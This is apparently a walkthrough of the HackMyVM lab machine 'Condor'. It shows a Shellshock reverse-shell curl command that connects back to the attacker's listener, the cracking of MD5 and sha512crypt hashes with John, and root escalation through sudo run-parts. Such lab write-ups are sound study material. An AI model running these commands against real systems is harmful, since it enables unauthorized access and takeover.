HackMyVM: Condor
This is Condor. It’s Medium rated.
Ports
Just SSH and HTTP only, points to a web shell somehow.
HTTP
This is an exercise in enumeration. dirsearch gives us not much, but it does give this:
[04:58:11] 200 - 20B - /cgi-bin/test.cgi
This is pointing at shellshock, but the cgi isn’t vulnerable. Nikto is usually good at these but
nikto -h http://10.10.10.13 -C all
gives me nothing. This is the eventual search that found the gold:
feroxbuster -u http://10.10.10.13/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -t 200 -C 403 --no-recursion -x txt,php,jpg,jpeg,gif,png,wav,log,zip,bak,sh,py,cgi
Obviously at this point I wasn’t 100% sure I was looking for a script but I was certainly awake to the possibility. The hit is condor.sh.
I get a shell:
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.2/1234 0>&1' http://10.10.10.13/cgi-bin/condor.sh
┌──(root💀kali)-[/opt/hackmyvm/condor]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.13] 45246
bash: cannot set terminal process group (423): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$Boom.
Privesc
We have two users; kevin and paulo. Paulo has user.txt but we can’t read it.
4.0K drwxr-xr-x 3 kevin kevin 4.0K Nov 6 16:23 .
4.0K drwxr-xr-x 4 root root 4.0K Nov 6 15:57 ..
0 lrwxrwxrwx 1 root root 9 Nov 6 16:23 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 kevin kevin 220 Nov 6 15:02 .bash_logout
4.0K -rw-r--r-- 1 kevin kevin 3.5K Nov 6 15:02 .bashrc
4.0K -rw-r--r-- 1 kevin kevin 4.0K Nov 6 15:57 .i_did_it_again
4.0K drwxr-xr-x 3 kevin kevin 4.0K Nov 6 15:57 .local
4.0K -rw-r--r-- 1 kevin kevin 807 Nov 6 15:02 .profile
bash-4.3$ cat .i_
cat .i_did_it_again
8395d26f20d997f971919e93edee06d3:$6$TCX.c/9ARPR3KCFE$4ZhsWox9dPa8/CG4O6socHVYYM6cJbtpaBx9cefvABC8gP0vMrWsgBhUUGoAHWnJI.X.NyzP5sbtMpGGfwuS11
307dcfe346e38992d47000630bd19579:$6$gwBgUJgQHGxTex13$b/67Oe7CIvDS85hex4GrHC2RuEkLRfWHAAgimHNyxC/L5biEqSly920uazvDXx3ACrM.srme6Us78aWUEGNAG0
# etcSo we have md5 hashes and sha512crypt hashes. Trying to crack all this will be painful. I pull out the md5 and run it through John:
┌──(root💀kali)-[/opt/hackmyvm/condor]
└─# john hash -w=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 29 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
paulo (?)
1g 0:00:00:00 DONE (2021-12-07 04:51) 1.219g/s 17491Kp/s 17491Kc/s 489775KC/s fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. So only one cracked, and it came to paulo. Probably what we want then. I re-hash paulo because John doesn’t tell me which one it was; it’s dd41cb18c930753cbecf993f828603dc. Which corresponds to $6$1tKf9R.0qo7v5DjD$uYneSfO1bb4upW2xlLw.hHGeuAtCunYhdOjQS2MBdnpPcMt0ZiZee42BjDO2jmUJffTXsKdo43SjE4pqM6WqJ/, which comes out as:
┌──(root💀kali)-[/opt/hackmyvm/condor]
└─# john hash_paulo -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)
1g 0:00:00:00 DONE (2021-12-07 04:54) 1.052g/s 1616p/s 1616c/s 1616C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Then we can pivot to paulo and it’s easy from there:
su paulo
Password: password123
id
uid=1001(paulo) gid=1001(paulo) groups=1001(paulo)
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
paulo@condor:/home/kevin$ sudo -l
sudo -l
Matching Defaults entries for paulo on condor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User paulo may run the following commands on condor:
(ALL : ALL) NOPASSWD: /usr/bin/run-partsRunparts is pure GTFObins:
paulo@condor:/home/kevin$ sudo -u root run-parts --new-session --regex '^sh$' /bin
<udo -u root run-parts --new-session --regex '^sh$' /bin
/bin/sh: 0: cant access tty; job control turned off
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
condor
Tue 07 Dec 2021 10:55:15 AM CET
# cd /root
cd /root
# ls -lash
ls -lash
total 32K
4.0K drwx------ 4 root root 4.0K Nov 6 16:24 .
4.0K drwxr-xr-x 18 root root 4.0K Nov 6 11:53 ..
0 lrwxrwxrwx 1 root root 9 Nov 6 16:23 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Nov 6 12:04 .local
4.0K -rw-r--r-- 1 root root 161 Jul 9 2019 .profile
4.0K -rw-r--r-- 1 root root 36 Nov 6 16:09 root.txt
4.0K drwx------ 2 root root 4.0K Nov 6 12:05 .ssh
4.0K -rw-r--r-- 1 root root 166 Nov 6 12:17 .wget-hsts
# cat root.txt
cat root.txt
FLAG_GOES_HEREShort and sweet.